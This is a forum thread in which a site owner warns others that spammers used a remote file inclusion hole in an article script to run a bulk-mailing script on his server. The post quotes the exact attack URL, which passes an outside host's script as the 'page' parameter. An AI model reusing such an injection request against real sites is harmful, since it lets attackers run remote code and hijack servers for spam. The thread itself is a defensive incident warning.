- This topic is empty.
-
Posts
-
Hey guys,
These CPays BH’ers were using one of my servers to send email.. How did they do it? Read on….
First, they found an exploit in a script called ‘Article Beach’ or ‘Own your very own article script’ to insert a new page….. They, then hosted a little script on their by calling:
http://meuorkut.front.ru/sendto?
as a parameter to my index page, fully exploiting the script. The call looked like this:
http://www.postanarticle.com/index.php?page=http://meuorkut.front.ru/sendto?
And – if you take a look at the file that it calls, it is a fully automated mailing script which can send out boatloads of spam.
SO – reason I am mentioning… Check your logs to see if that url is located anywhere, especially if you are using a CMS of ANY sort. From this script, I can see that they must be using a program on their end to control it. After that, it just runs and sends out the mail they requested it send. I do NOT want to be part of the spam campaign, so I got rid of it.
Don’t worry, they did not compromise my gambling.postanarticle subdomain – just the home domain which I have not used since I purchased it.
kw
This happened to me a couple of years ago and resulted in major hassle and I had to take a poker domain offline that was doing well for me.
Never caught up to that domain’s performance in poker again.
Lucky for me it was on the domain I do not use, but still – they were sending out 5000 emails in each batch. Not sure how many batches were being sent
